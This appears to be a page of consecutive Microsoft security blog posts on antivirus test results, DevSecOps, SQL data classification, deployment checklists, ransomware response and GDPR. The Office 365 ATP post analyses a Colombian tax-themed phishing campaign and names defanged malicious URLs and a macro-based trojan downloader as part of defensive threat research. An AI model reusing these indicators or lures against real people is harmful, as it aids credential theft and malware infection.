Adding transparency and context into industry AV test results


Corporate Vice President Brad Anderson recently shared his insights on how Windows Defender Advanced Threat Protection (Windows Defender ATP) evolved to achieve important quality milestones. Our Windows Defender ATP team is committed to delivering industry-leading protection, customer choice, and transparency on the quality of our solutions. In the continued spirit of these principles, we want to share the results of the January-February 2018 test conducted by independent antivirus tester AV-TEST and provide a transparency report that augments the test findings with contextual information to help our customers make informed decisions about Windows Defender ATP adoption.

Download the complete transparency report on January-February 2018 test results


At a high-level, the transparency report shows:

Protection: Windows Defender Antivirus (Windows Defender AV) achieved a perfect score in Protection, maintaining consistently high scores in this category.
Usability (false positives): Windows Defender AV achieved an improved Usability score of 5.5/6.0. Per our telemetry, samples that Windows Defender AV incorrectly classified (false positive) had very low prevalence and are not commonly used in business context.
Performance: Windows Defender AV improved this cycle, achieving a 5.5/6.0 Performance score and outperforming the industry in almost all areas. These results reflect the investments we put in optimizing Windows Defender AV performance for high-frequency actions (e.g., application run).


While independent tests can help assess a security solutions capabilities and protections, it is important to understand that antivirus tests are only one part of a complete quality assessment. To truly understand the protection quality of an endpoint protection platform (EPP) and endpoint detection and response (EDR) solution like Windows Defender ATP, its entire set of capabilities must be evaluated.

For instance, while Windows Defender ATPs antivirus capability achieved a perfect overall Protection score in the January-February 2018 tests and only missed two out of thousands of samples tested, it performed even better than the results suggest. The Windows Defender Security Intelligence team tested the two missed samples against the entire Windows Defender ATP stack to assess these samples ability to infect machines in real-world enterprise environments. The team was able to confirm that the two missed samples were detected and mitigated by other components of the Windows Defender ATP stack.


As threats become more sophisticated, Microsoft and other security platform vendors continue evolving their product capabilities to detect threats across different attack stages. We hope to see independent testers evolve their methodologies as well. Our customers need greater transparency and optics into what an end-to-end solution can accomplish in terms of total preventive protection, including the quality of individual components like antivirus. Microsoft is highly engaged in working with several independent testers to evolve security testing to focus on end-to-end security stack testing.

Meanwhile, we continue to focus on improving our next-generation antivirus solution while at the same time delivering new innovative capabilities like attack surface reduction and hardware-based isolation, just to name a few. In the Windows 10 April 2018 Update, you can experience these new and improved capabilities in Windows Defender ATP, which provides a complete endpoint protection platform (EPP) and endpoint detection and response (EDR) solution. To see these capabilities for yourself sign up for a 90-day trial of Windows Defender ATP today, or enable Preview features on existing tenants.



Zaid Arafeh

Senior Program Manager, Windows Defender Research team


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Want better apps? You need a (agile security) hero!

If weve learned anything from the rise of Marvel Cinematic Universe, its that good things tend to happen when heroes intervene. For securing new applications, this metaphor is a useful one because security isnt always top-of-mind for scrum teams, nor is it always conducive to meeting aggressive deadlines. But in the world of software security these heroes are critical because they are risk-aware, highly skilled developers who understand software design, robust development, and the importance of architecting for resiliency.

During my session at IANS Los Angeles Information Security Forum this week about driving security into DevSecOps, I was reminded how difficult it is for company leaders who are strapped for time and resources to find, train, and integrate these heroes. While I covered topics like how to measure the maturity of a DevSecOps program, and ways to incentivize the development team to work with security, the conversation often came back to finding good people and getting them integrated into existing team processes.

Meanwhile more organizations are moving to a full continuous integration/continuous deployment (CI/CD) model for faster software development as consumer demands evolve faster than ever and expectations rise alongside the rapid deployment of new enhancements and features in the market place. While this model can help improve the speed of new technology to market, the core of its success or failure is how well scrum teams collaborate to address complex design and implementation problems. Communication is another critical component, and can be the difference between a successful launch and an insurmountable gating factor, such as needing to punch a new hole in the firewall to get a service to run. The bottom line is nobody wins when security is compromised to standup a new release.

Scrum teams need a security master to facilitate this communication. But this individual isnt a scrum dictator sent to hijack control. They should be a facilitator who works with the scrum team and product owner to drive security into the development process. This is where these individuals really start to attain hero status because they arent just defining a critical set of security requirements, they are relationship builders fostering new collaborations.

A collaborative DevSecOps security hero guides the team through general security requirements, features, functions, and architectures in an appropriate fashion and cadence that can easily be integrated into existing processes. Its important for this scope of work to be well defined and present to meet the teams Definition of Done (DoD). Specific requirements defined by individual user stories in the working code spring help speed the process by ensuring security is represented properly in the DoD. These user stories are important artifacts that can be utilized by the entire scrum team for better alignment, and ensure there are no lengthy gating gotchas at the end of the process.

For example, a common vulnerability in modern applications revolves around the improper use, or lack of use, of cryptography with encrypting sensitive data. A general requirement could be written to protect data entered in a form cryptographically that ties back to a user story about a phase-locked loop (PLL). Once the data is encrypted it can be sent to a server team with agile security experts. By writing these agile security requirements and by addressing them systematically at all levels of the development process, teams can layer in security to existing user stories more quickly, resulting in apps services, or products with less vulnerabilities.

So where do scrum teams find these heroes? The right person might be closer than you think. Often you dont need to hire an outsider or pilfer resources from the security operations center. Instead, you can evaluate in-house developers with an affinity for security, a code expert in the reverse engineering team, or anyone in the release pipeline really who is interested, engaged, and shows the acumen to be a part of what the organization is looking to accomplish. The key is once youve identified and selected this individual that you nurture them. Provide additional security training, allow them the requisite time to fully understand the current processes in play, and ensure their annual business goals reflect their security work. Remember if someone is only rewarded for speed, security will take a back seat and your apps, services, and products will suffer.

Every organization has unique challenges, so start with one team and learn what works and what doesnt work before making broad, sweeping changes. Once the process is clicking, and new security requirements are flowing into your applications, you can radiate out the agile security hero model to your other internal, and even external (sourced via a third party) teams. Implementing this model doesnt mean your code will be perfectly secure. But having a security minded advocate in the scrum makes it a lot easier to incorporate secure measures and features into new releases.

Categories: cybersecurity Tags:

Data classification and protection now available for structured data in SQL

This post is authored by Gilad Mittelman, Senior Program Manager, SQL Data Security.

Data privacy and data security have become one of the most prominent topics in organizations in almost every industry across the globe. New regulations that formalize requirements are emerging around these topics and compel organizations to comply.

The upcoming EU Global Data Protection Regulation (GDPR), which takes effect on May 25, 2018, is one of the most noteworthy of these new regulations. It sets a new global bar for privacy rights, security, and compliance, mandating many requirements and obligations on organizations across the globe. Complying with this regulation will necessitate significant investments in data handling and data protection for a very large number of organizations.

GDPR and Microsoft SQL

SQL Information Protection (SQL IP), now in public preview, complements the existing Microsoft Information Protection (MIP) unstructured data classification framework (Azure Information Protection, Microsoft 365) and extends it with new structured data classification capabilities.

Microsoft SQL customers who are subject to the GDPR, whether managing cloud-based or on-premises databases or both, will need to ensure that qualifying data in their database systems is aptly handled, protected and monitored according to GDPR principles. This means that many customers will need to review or modify their database management and data handling procedures, especially focusing on the security of data processing as stipulated in the GDPR the first step in this journey to compliance is discovering and tagging where such sensitive data resides within the database environment.

SQL IP introduces advanced capabilities built into Azure SQL Database and SQL Server for discovering, classifying, labeling and protecting the sensitive data in your SQL databases.

Discovering and classifying your most sensitive data (business, financial, healthcare, PII, etc.) can play a pivotal role in your organizational information protection stature. It can serve as infrastructure for:

  • Helping meet data privacy standards and regulatory compliance requirements, such as GDPR.
  • Data-centric security scenarios, such as monitoring (auditing) and alerting on anomalous access to sensitive data.
  • Controlling access to and hardening the security of databases containing highly-sensitive data.

What is SQL Information Protection?

SQL IP introduces a set of advanced services and new SQL capabilities, forming a new information protection paradigm in SQL aimed at monitoring and protecting the data, not just the database:

  • Discovery and recommendations A built-in classification engine scans your database and identifies columns containing potentially sensitive data. It then provides you an effortless way to review and apply the appropriate classification recommendations via the Azure portal or via SQL Server Management Studio.
  • Labeling Sensitivity classification labels can be persistently tagged on columns using new classification metadata attributes introduced into the SQL Engine. This metadata can then be utilized for advanced sensitivity-based auditing and protection scenarios.
  • Monitoring/Auditing Sensitivity of the query result set is calculated in real time and used for auditing access to sensitive data. Additional logic can then be applied on top of the audit logs, for identifying and alerting on anomalous access to sensitive data, data extraction of large volumes of PII, etc.
  • Visibility – The database classification state can be viewed in a detailed dashboard in the portal as seen in Figure 1 below. Additionally, you can download a report (in Excel format) to be used for compliance & auditing purposes, as well as other needs.

Figure 1: Data discovery and classification dashboard

SQL Information Protection in action demo video

The following video demonstrates the main SQL Information Protection public preview capabilities for Azure SQL DB and SQL Server:

What’s next?

Additional SQL IP capabilities will continue rolling out throughout the upcoming year, with a focus on scale and automation.

Well be introducing centralized management via Azure Security Center, enabling organizations to customize the organizational information protection policy with proprietary labels and discovery (recommendations) logic enrichment. Well also be introducing centralized dashboards for visibility into the sensitivity state of all resources across the entire database estate.

In addition, various automation capabilities will be exposed, for supporting fully automated classification and labeling of large numbers of databases at scale.

We encourage customers to contact us with any questions or feedback at

Additional resources on SQL Information Protection

More details on using SQL Information Protection can be found in:

Categories: Uncategorized Tags:

Partnerships power the future of better security

This post is authored by Jeremy Dallman, Principal Program Manager.


Our goal in building the Microsoft Graph Security API is to enable customers to share insights and take action across security solutions to improve protection and speed response. By creating a connected security ecosystem, Microsoft and partners can enable developers to simplify integration and alert correlation, unlock valuable context to aid investigation, and streamline security operations.

Palo Alto Networks shares the vision of enabling better integration to benefit our joint customers. They are a member of Microsoft Intelligent Security Association and as part of the Graph Security API launch at RSA, we showcased an application that demonstrated the power of integration between multiple Microsoft and Palo Alto Networks security offerings. We demonstrated how a Palo Alto Networks provider for the Security Graph can prevent successful cyberattacks by correlating alerts from Microsoft with its threat intelligence, firewall logs, and automated firewall policy changes.

Microsoft Graph Security API proof of concept integration using PowerBI

Our close collaboration continues and this week at the Palo Alto Networks user conference, Ignite 2018, we will unveil the latest joint innovation. Microsoft and Palo Alto Networks have worked to connect the Microsoft Graph Security API and the Palo Alto Networks Application Framework with a provider that brokers interactions between the two platforms. We will also demo a Microsoft PowerBI solution that accesses information from both the Palo Alto Networks Application Framework and the Microsoft Graph Security API giving our customers the ability to query and access all of their security data through a common interface.

For those attending Ignite this week, be sure to join the Wednesday (5/23) 4:00PM session where Jason Wescott and Francesco Vigo will discuss the collaboration between Microsoft Graph Security API and the Palo Alto Networks Application Framework. If you arent at Ignite, visit the Graph Security API documentation or sign up to request access to the Palo Alto Networks Application Framework API to start exploring how you can take advantage of this powerful collaboration!

Categories: cybersecurity, Security Development Tags:

Now that you have a plan, it’s time to start deploying

This blog is part of a series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series, youll find context, answers, and guidance for deployment and driving adoption within your organization. Check out our last blog First Things First: Envisioning Your Security Deployment.

In our previous blog post, we covered how FastTrack for Microsoft 365 can help you envision a successful Microsoft 365 security deployment. Now, well cover the next phase of our three-phase planning approach: Onboard. This is where you move from strategy and objectives to the practical details of your deployment planning.

The Onboard phase is a critical time to remove any blockers you have, clean up any issues that might prevent your preferred deployment approach, and then start setting up services and users that integrate with your environment. The FastTrack team can help coordinate the setup, configuration, and provisioning of many of your Microsoft 365 services.

We will cover how to Drive Value with FastTrack for Microsoft 365 in our next blog. But first

Your onboard checklist

The following checklist provides some of the items and actions that our FastTrack team can help you work through during the Onboard phase:

Network and Client

  • Identify and prepare DNS, network, and infrastructure needs
  • Configure DNS for eligible services
  • Configure TCP/IP protocols and firewall ports
  • Identify and prepare client needs (Internet browser, client operating system, and services’ needs)
  • Enable eligible services that have been purchased and defined as part of onboarding
  • Establish the timeline for remediation activities
  • Activate your Microsoft online service tenant or subscription
  • Validate connectivity to Microsoft online services


  • Provision user identity including licensing
  • Configure Azure AD Identity Protection
  • Configure Self Service Password Reset (SSPR)
  • Configure Azure Multi-Factor Authentication
  • Configure Privileged Identity Management
  • Set up Azure AD Conditional Access policies
  • Synchronize Azure AD Connect directory (with password writeback and password hash sync)

Access Management

  • Configure identities to be used by Intune, by either leveraging your on-premises Active Directory or cloud identities (Azure AD)
  • Add users to your Intune subscription, define IT admin roles (Helpdesk operator, admins, etc.), and create user and device groups
  • Configure and deploy Intune app protection policies for each supported platform and prepare line-of-business apps for app protection policies

Mobile Device Management (MDM)

  • Configure your MDM authority and policies and test to validate MDM management policies
  • Configure profiles on devices for supported platforms
  • Enroll devices of each supported platform to Intune or Configuration Manager with Microsoft Intune service

Ready for action? Start with a Success Plan

Our FastTrack Success Plan is an online tool that walks you through each step of Microsoft 365 Security planning process, from Envisioning to Onboarding to Driving Value and adoption with users.

The Success Plan can be launched by either you or your Microsoft Partner and provides all the guidance and resources you need to plan a successful Microsoft 365 Security deployment. Once completed, the plan also provides you with a clear path to help you get the most out of your FastTrack services. To get started, simply sign in to FastTrack.

FastTrack provides end to end guidance for planning, onboarding, and driving end user adoption for Microsoft 365 which is comprised of Enterprise Mobility + Security (EMS), Windows 10, and Office 365.

More blog posts from this series:

Categories: Uncategorized Tags:

Securing the modern workplace with Microsoft 365 threat protection – part 4

This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security.

Responding to ransomware in the Modern Workplace

Over the last few weeks, we have shared the roots of Microsoft 365 threat protection and how Microsoft 365 threat protection helps protect against and detect a modern ransomware attack. Today, we conclude our blog series by discussing how Microsoft 365 threat protection can help respond to attacks and also helps educate and raise awareness of threats to end users. In our ransomware scenario, once the threat has been detected, Microsoft 365 also helps respond and remediate with automation playing a key role in making the response more manageable, accurate, and less time consuming for administration. Microsoft 365 threat protection response and remediation services are shown in figure 1 below.

Ransomware Detection with Microsoft 365
Windows Defender Advanced Threat Protection
Azure Advanced Threat Protection
Microsoft Cloud App Security
Azure Security Center
Office 365 Advanced Threat Protection
Office 365 Threat Intelligence

Figure 1. Microsoft 365 threat protection helps detect threats to the modern workplace

In our ransomware scenario, Windows Defender Advance Threat Protection (WDATP) alerts security operations teams about suspicious activities such as programs launching self-replicating copies. If the ransomware does manage to infect multiple devices, WDATP automatically investigates alerts, applies artificial intelligence to determine whether a threat is real and then decides what action to take. It then automatically remediates the threat from affected endpoints to stop further damage as shown in figure 2.

Figure 2. WDATP automation mapping the propagation of a threat

WDATP provides manual machine level responses, such as isolating a machine to contain the threat. Further, forensic data is collected to better understand the attack and the attacker. WDATP also includes file level response by quarantining or blocking malicious files. Azure Security Center also leverages automation by helping orchestrate these common security workflows:

  • Routing alerts to a ticketing system
  • Applying additional security controls
  • Gathering additional information
  • Asking a user to validate an action
  • Blocking a suspicious user account
  • Restricting traffic from an IP address

Azure Security Center employs behavioral analytics to uncover patterns and malicious activity to enable proactive policies to be set in place to help prevent impact from future attacks. Response times are also improved with expanded signal from Azure Security Centers 3rd party integrations with firewalls and anti-malware engines. While Azure Security Center enables security operations personnel to respond to threats to the enterprise infrastructure, admins can quickly respond to threats to user identities by creating activity policies with Microsoft Cloud App Security (shown in figure 3) which can take the action of suspending a user account when the predefined conditions are met. In our example, the ransomware propagates using the brute force password technique which requires multiple logins, thus login failures from a unique account are likely and this can be a trigger for Microsoft Cloud App Security to suspend an account. One of the powerful benefits of Microsoft Cloud App Security is that it extends protection beyond the Microsoft ecosystem. Even if login attempts are made from popular enterprise applications that are not Microsoft client apps, Microsoft Cloud App Security enables admins to respond to the anomalous activity.


Figure 3. Microsoft Cloud App Security General Dashboard

In Microsoft 365, threat response and remediation is offered with Office 365 Threat Intelligence. Using the Threat Explorer feature, security analysts and administrators can search for all instances of potentially malicious emails that may contain ransomware. The back-end is designed for efficient threat investigation and remediation. Emails that are part of a ransomware campaign can easily be discovered using a variety of search filters with the Threat Explorer shown in figure 4. The admin can select all the emails that need to be investigated from a specific sender and choose to take immediate action on potentially malicious emails including: move to junk, move to deleted items, soft delete, hard delete, and move to inbox. Choosing the delete action purges the malicious emails from all tenant mailboxes. There is also the option of creating an incident so that a manager must approve the action.

Figure 4. Office 365 Threat Explorer email remediation actions

Educating end users about ransomware in the modern workplace

We discussed cyber education as an important element for protecting organizations. Having end users who are prepared and informed on spotting potential cyber attacks is a powerful manner to preventing attacks from harming an organization. Attack Simulator, shown in figure 5, is a new feature of Office 365 Threat Intelligence currently in public preview. Among several simulations is the Display Name Spear Phishing Attack. Spear phishing is a subset of phishing, aimed at a specific group, individual, or organization and as we discussed before, a method of spreading ransomware. Attack Simulator harnesses signal from Office 365 Threat Intelligence which provides visibility into an organizations most targeted and potentially most vulnerable users and enables admins to launch simulated threats targeting those very same users. This provides the most targeted users with training on recognizing phish emails which include ransomware and provides admins visibility on how those users behave during an attack, enabling optimal policy updates and security protocols.

Figure 5. Attack Simulator UI

Since the attack surface of the modern workplace is complex and broad, Attack Simulator will begin to offer simulated attacks made through other attack vectors as it moves from preview to GA. Attack Simulator will help raise user awareness and effectiveness at spotting attacks from all the common attack vectors.

Microsoft 365 threat protection

Microsoft has heavily invested in helping secure our customers for many years by building security in our products from the ground up. In the last few years, as the level of cybercrime has increased, we have also increased our efforts and focus on developing and continuously updating advanced security solutions to protect customers from a wide variety of threats and types of attack. In this ransomware scenario, you see as an example, our continued focus on security which provides end users ultimate protection from modern threats, while giving administrators a powerful set of tools to help protect, detect, respond and even educate against these threats. Threat protection is only one key aspect of Microsoft 365. Learn more about Microsoft 365 and understand how it can help your organization through its digital transformation journey. Additionally, follow the links below to learn more about the Microsoft 365 threat protections services and experience them by starting a trial.

Categories: Uncategorized Tags:

Use Windows Information Protection (WIP) to help make accidental data leakage a thing of the past

Have you always wished you could have mobile application management (MAM) on Windows?

Now you can!

Windows Information Protection (WIP) is an out-of-the box data leakage prevention feature for Windows 10 that can automatically apply protection for work files and data to prevent accidental data leakage. With 600 million active Windows 10 devices, corporate customers continuing to deploy in earnest throughout 2018, and support for WIP built right into Office 365 ProPlus, its benefits are within easy reach.

Sixty to eighty percent of data leakage is accidental (see ICO data for 2016 and 2017). WIP is a key feature that offers much needed data protection for files at rest on the Windows platform, for any organization with sensitive data, big or small. In todays security ecosystem, companies are spending $93B on security features (enough to host seven Olympic Games!). Yet companies still saw a 29 percent increase in data leakage worldwide between 2016 and 2017. WIP comes as a timely solution.

With Windows 10, Microsoft is providing a fundamental solution to this growing problem. Recognizing that the risk of leak comes from both fully managed devices and personal devices accessing work resources, we designed WIP to be deployed on PC and mobile devices running Windows 10. WIP is designed for organizations of all shapes and sizes, as a scalable solution that works to prevent accidental data leakage for end users.

WIP protects users and organizations from accidental leaks via copy-and-paste, drag-and-drop, removable storage (e.g., USB thumb drives), and unauthorized applications (e.g., non-work cloud storage providers). Windows shell integration appears in clear but unobtrusive ways. Elements like File Ownership are displayed and selectable in Explorer and File Save As dialog. Helpful briefcase icons mark resources when you are in a work context in places like window title bars, and Microsoft Edges navigation bar. Unauthorized applications are blocked from single sign-in with work credentials. WIP also includes the ability to perform selective wipe of business information, while leaving personal data behind.

WIP has three simple policy enforcement modes. It lets you choose how and whether the user experience in the clipboard, save dialog, and similar data-sharing cases have options (overrides) to move work content to non-work context. You can decide to Hide Overrides, Allow Overrides for your users, or even deploy in Silent mode just for auditing. Silent mode does not restrict unmanaged apps from opening work data the way Hide Overrides and Allow Overrides do, so you can get away with configuring less, yet still benefiting from the BYOD selective wipe capability for your work data, such as data downloaded from OneDrive for Business and Outlook email. This means when you or your user decides to unenroll their work account from their personal device, that work data stops being accessible.

WIP policy can be deployed in a few clicks in Microsoft Intune for MAM-only (without enrollment) targeting, MDM (with enrollment), or both. Being able to apply MAM-only policy will help you finally enable BYOD in regions and situations where fully managing the personal device is unacceptable. For companies that are not yet fully in the cloud, WIP policy can also be set on domain-joined computers using System Center Configuration Manager. Then, when youre ready for co-management, you can move the WIP policy management authority to Microsoft Intune.

Your corporate files can also be automatically encrypted with a local key when downloaded to WIP-managed devices. You can do this by configuring your corporate network boundary. Using network isolation policies, you can identify your LAN and corporate cloud resources, which Edge and other applications will use to recognize work sites and encrypt the data that comes from there. This works even better when combined with Conditional Access controls on Exchange Online and SharePoint Online to ensure that only managed devices can reach that data.

Additionally, WIP Learning lets you see the applications you didnt know are used with work data. It reports any app not in your policy that tries to access a work resource. You can see this data in Microsoft Intune or your Windows Analytics portal, if you have Azure Log Analytics (formerly Microsoft Operations Management Suite or OMS). WIP Learning allows you to tune your app policy to add legitimate work apps and even detect apps that should not be trying to access work data. Combined with Silent mode, you can deploy and see the immediate benefit of selective wipe control and auditing, while tuning your app list for different deployment groups in preparation for enabling boundary enforcement.

WIP provides a robust and automatic solution for protecting work data coming to the Windows device, but it also pairs well with Azure Information Protection (AIP). AIP adds the ability to control and help secure email, documents, and sensitive data that are shared, even outside your company and in the Azure cloud. WIP, combined with AIP, provides application-level access control capabilities while preventing unauthorized applications from accessing business information at rest and in flight. At the same time, WIPs simple business vs personal information classification system ensures simplicity and ease of use.

USB flash drives arent the only way data can leave a device. With the app restrictions on accessing work data, you can use WIP to guide users to use Outlook with their corporate email account to send work attachments, and SharePoint or OneDrive for Business to collaborate on work documents. This lets you enhance your overall data protection with Office DLP outbound rules, send email notifications, policy tips, and Office 365 Information Protection for GDPR.

WIP originally shipped in the Windows 10 Anniversary Update (version 1607) and since then, working across Microsoft and with industry, we have made a number of improvements, including:

  1. Support for Office 365 ProPlus, Microsoft Teams, and numerous inbox apps
  2. Simplified management Intune quick setup, WIP Learning for Apps and Network Boundary policy
  3. Manageable as MAM-only (i.e. without full device enrollment)
  4. Improved Recovery (e.g. data access resumes via re-enrollment or re-adding your work account)
  5. AIP integration to enable roaming data on removable storage (e.g. USB thumb drives)
  6. Support from 3rd party apps such as from Citrix (ShareFile), DropBox (desktop sync client), Foxit (Reader, PhantomPDF), and WinZip (WinZip 21, WinZip 22)

With all these features available, WIP is easier than ever to deploy and maintain. Enable this fast, robust, user-friendly security solution to help ensure a more effortlessly secure user experience for your organization.

More information on Windows Information Protection (WIP) found in the following resources:

The final compliance countdown: Are you ready for GDPR?

On May 25, the General Data Protection Regulation (GDPR) will replace the Data Protection Directive as the new standard on data privacy for all organizations that do business with European Union (EU) citizens.[1]When GDPR goes into effect, government agencies and organizations that control, maintain, or process information involving EU citizens will be required to comply with strict new rules regarding the protection of personal customer data.

GDPRs broad scope and holistic interpretation of personal information leaves these agencies and organizations responsible for protecting a wide range of data types, including genetic and biometric data.[2]Leading up to the GDPR rollout, many companies will be reevaluating their current data storage and sharing methods, and determining whether they need to implement new strategies. More than ever, this regulatory transition highlights the importance of prioritizing a strong and comprehensive security stance within your organization.

According to a recent GDPR benchmarking survey, although 89 percent of organizations have (or plan to have) a formal GDPR-readiness program, only 45 percent have completed a readiness assessment.[3]Regardless of where your organization and its security protocols are in terms of GDPR-readiness, Microsoft can help. Microsoft has been working on GDPR-compliant business and engineering solutions for the better part of a year. Because of our extensive experience developing products with security built-in, weve been a leading voice on privacy and GDPR-related issues with EU regulators.

Weve turned these conversations and insights into a free, four-part video series. Watch the Countdown: Preparing for GDPR series today to hear from industry experts and learn more about Microsofts commitment to helping your organization achieve GDPR-compliance.

You can also read more about our point of view on this transition as the first hyper-scale cloud vendor to offer GDPR terms and conditions in the enterprise space.

Finally, you are invited to a free May 25th GDPR live webcast, Safeguarding individual privacy rights with the Microsoft Cloud. Youll learn how you can:

  • Use GDPR fundamentals to assess and manage you compliance risk.
  • Help protect your customers’ data with our built-in, intelligent security capabilities.
  • Meet your own compliance obligations by streamlining their processes.




Categories: Uncategorized Tags:

Enhancing Office 365 Advanced Threat Protection with detonation-based heuristics and machine learning

Email, coupled with reliable social engineering techniques, continues to be one of the primary entry points for credential phishing, targeted attacks, and commodity malware like ransomware and, increasingly in the last few months, cryptocurrency miners.

Office 365 Advanced Threat Protection (ATP) uses a comprehensive and multi-layered solution to protect mailboxes, files, online storage, and applications against a wide range of threats. Machine learning technologies, powered by expert input from security researchers, automated systems, and threat intelligence, enable us to build and scale defenses that protect customers against threats in real-time.

Modern email attacks combine sophisticated social engineering techniques with malicious links or non-portable executable (PE) attachments like HTML or document files to distribute malware or steal user credentials. Attackers use non-PE file formats because these can be easily modified, obfuscated, and made polymorphic. These file types allow attackers to constantly tweak email campaigns to try slipping past security defenses. Every month, Office 365 ATP blocks more than 500,000 email messages that use malicious HTML and document files that open a website with malicious content.

Figure 1. Typical email attack chain

Detonation-based heuristics and machine learning

Attackers employ several techniques to evade file-based detection of attachments and blocking of malicious URLs. These techniques include multiple redirections, large dynamic and obfuscated scripts, HTML for tag manipulation, and others.

Office 365 ATP protects customers from unknown email threats in real-time by using intelligent systems that inspect attachments and links for malicious content. These automated systems include a robust detonation platform, heuristics, and machine learning models.

Detonation in controlled environments exposes thousands of signals about a file, including behaviors like dropped and downloaded files, registry manipulation for persistence and storing stolen information, outbound network connections, etc. The volume of detonated threats translate to millions of signals that need to be inspected. To scale protection, we employ machine learning technologies to sort through this massive amount of information and determine a verdict for analyzed files.

Machine learning models examine detonation artifacts along with various signals from the following:

  • Static code analysis
  • File structure anomaly
  • Phish brand impersonation
  • Threat intelligence
  • Anomaly-based heuristic detections from security researchers

Figure 2. Classifying unknown threats using detonation, heuristics, and machine learning

Our machine learning models are trained to find malicious content using hundreds of thousands of samples. These models use raw signals as features with small modifications to allow for grouping signals even when they occur in slightly different contexts. To further enhance detection, some models are built using three-gram models that use raw signals sorted by timestamps recorded during detonation. The three-gram models tend to be more sparse than raw signals, but they can act as mini-signatures that can then be scored. These types of models fill in some of the gaps, resulting in better coverage, with little impact to false positives.

Machine learning can capture and expose even uncommon threat behavior by using several technologies and dynamic featurization. Features like image similarity matching, domain reputation, web content extraction, and others enable machine learning to effectively separate malicious or suspicious behavior from the benign.

Figure 3. Machine learning expands on traditional detection capabilities

Over time, as our systems automatically process and make a verdict on millions of threats, these machine learning models will continue to improve. In the succeeding sections, well describe some interesting malware and phishing campaigns detected recently by Office 365 ATP machine learning models.

Phishing campaigns: Online banking credentials

One of the most common types of phishing attacks use HTML and document files to steal online banking credentials. Gaining access to online bank accounts is one of the easiest ways that attackers can profit from illicit activities.

The email messages typically mimic official correspondence from banks. Phishers have become very good at crafting phishing emails. They can target global banks but also localize email content for local banks.
The HTML or document attachment are designed to look like legitimate sign-in pages or forms. Online banking credentials and other sensitive information entered into these files or websites are sent to attackers. Office 365s machine learning models detect this behavior, among other signals, to determine that such attachments are malicious and block offending email messages.

Figure 4. Sample HTML files that mimic online banking sign in pages. (Click to enlarge)

Phishing campaigns: Cloud storage accounts

Another popular example of phishing campaigns uses HTML or document attachments to steal cloud storage or email account details. The email messages imply that the recipient has received a document hosted in a cloud storage service. In order to supposedly open the said document, the recipient has to enter the cloud storage or email user name and password.

This type of phishing is very rampant because gaining access to either email or cloud storage opens a lot of opportunities for attackers to access sensitive documents or compromise the victims other accounts.

Figure 5. Sample HTML files that pose as cloud storage sign in pages. (Click to enlarge)

Tax-themed phishing and malware attacks

Tax-themed social engineering attacks circulate year-round as cybercriminals take advantage of the different country and region tax schedules. These campaigns use various messages related to tax filing to convincer users to click a link or open an attachment. The social engineering messages may say the recipient is eligible for tax refund, confirm that tax payment has been completed, or declare that payments are overdue, among others.

For example, one campaign intercepted by Office 365 ATP using machine learning implied that the recipient has not completed tax filing and is due for penalty. The campaign targeted taxpayers in Colombia, where tax filing ended in October. The email message aimed to alarm taxpayers by suggesting that they have not filed their taxes.

Figure 6. Tax-themed email campaign targeting taxpayers in Colombia. The subject line translates to: You have been fined for not filing your income tax returns

The attachment is a .rar file containing an HTML file. The HTML file contains the logo of Direccin de Impuestos y Aduanas Nacionales (DIAN), the Colombianes tax and customs organization, and a link to download a file.

Figure 7. Social engineering document with a malicious link

The link points to a shortened URL hxxps://bit[.]ly/2IuYkcv that redirects to hxxp://dianmuiscaingreso[.]com/css/sanci%C3%B3n%20declaracion%20de%20renta.doc, which downloads a malicious document.

Figure 8: Malicious URL information

The malicious document carries a downloader macro code. When opened, Microsoft Word issues a security warning. In the document are instructions to Enable content, which executes the embedded malicious VBA code.

Figure 9: Malicious document with malicious macro code

If the victim falls for this social engineering attack, the macro code downloads and executes a file from hxxp:// The downloaded executable file (despite the file name) is a file injector and password-stealing malware detected by Windows Defender AV as Trojan:Win32/Tiggre!rfn.

Because Office 365 ATP machine learning detects the malicious attachment and blocks the email, the rest of the attack chain is stopped, protecting customers at the onset.

Artificial intelligence in Office 365 ATP

As threats rapidly evolve and become increasingly complex, we continuously invest in expanding capabilities in Office 365 Advanced Threat Protection to secure mailboxes from attacks. Using artificial intelligence and machine learning, Office 365 ATP can constantly scale coverage for unknown and emerging threats in-real time.

Office 365 ATPs machine learning models leverage Microsofts wide network of threat intelligence, as well as seasoned threat experts who have deep understanding of malware, cyberattacks, and attacker motivation, to combat a wide range of attacks.

This enhanced protection from Office 365 ATP contributes to and enriches the integrated Microsoft 365 threat protection, which provides intelligent, integrated, and secure solution for the modern workplace. Microsoft 365 combines the benefits and security technologies of Office 365, Windows, and Enterprise Mobility Suite (EMS) platforms.

Office 365 ATP also shares threat signals to the Microsoft Intelligent Security Graph, which uses advanced analytics to link threat intelligence and security signals across Office 365, the Windows Defender ATP stack of defenses, and other sensors. For example, when a malicious file is detected by Office 365 ATP, that threat can also be blocked on endpoints protected by Windows Defender ATP and vice versa. Connecting security data and systems allows Microsoft security technologies like Office 365 ATP to continuously improve threat protection, detection, and response.



Office 365 Threat Research

Here is Homeland Security, black swans, and thwarted cyberattacks

May 9th, 2018 No comments

Last week, I had the honor of addressing The Homeland Security Training Institute (HSTI) at the College of DuPage as part of the HSTI Live educational series. The event featured other prominent speakers at the forefront of cybersecurity defense, including:

Dave Tyson, CEO of CISO Insights, a global cybersecurity consultant and Nicole Darden Ford, Vice President and Chief Information Security Officer of Baxter Healthcare. Dave broke down complex cybersecurity issues making them relatable to the audience, a skill hes also honed through his other business venture, CEO of Nicole shared her firsthand experiences dealing with the challenges and the successes of a modern CISO in the healthcare industry. Nicole has global responsibility for information security as well as information technology quality compliance and information governance.

I presented findings from the most recent Microsoft Security Intelligence Report v23, diving into themes and specifics behind old and new malware propagated through massive botnets, and phishing, and ransomware attacks. And, importantly, providing advice and guidance on steps organizations can take to help protect themselves and their critical assets.

It was a great set of talks that spawned a lot of interesting dialogs. After the event, I was stopped by someone who asked me why our cyber defenses arent sophisticated enough to stop all cyberattacks before they penetrate our systems. Its a fair question, especially when you consider the substantial amount of annual investment organizations make in hardware, software, and human capital. For example, its not uncommon for regulated and larger businesses to have teams dedicated to 24/7, 365 surveillance and monitoring of their systems. Yet, the bad guys still get in, plant malware, compromise proprietary information, and reveal sensitive customer data.

